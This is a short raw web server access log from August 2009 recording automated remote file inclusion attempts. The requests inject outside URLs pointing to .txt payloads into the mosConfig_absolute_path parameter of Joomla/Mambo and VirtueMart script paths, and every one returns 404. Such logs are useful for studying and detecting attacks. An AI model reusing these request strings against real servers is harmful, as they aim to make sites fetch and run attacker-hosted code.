206.176.241.116 - - [05/Aug/2009:00:38:55 -0400] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.loveject.com/board//data/.log/id.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
206.176.241.116 - - [05/Aug/2009:00:38:55 -0400] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.loveject.com/board//data/.log/id.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
206.176.241.116 - - [05/Aug/2009:00:38:55 -0400] "GET /logs/access_log.Q109053100/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.loveject.com/board//data/.log/id.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
59.22.140.17 - - [05/Aug/2009:00:39:06 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://btz-computerservice.de/owa/templates_c/fx29id1.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
59.22.140.17 - - [05/Aug/2009:00:39:06 -0400] "GET /logs/access_log.Q109070400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://btz-computerservice.de/owa/templates_c/fx29id1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
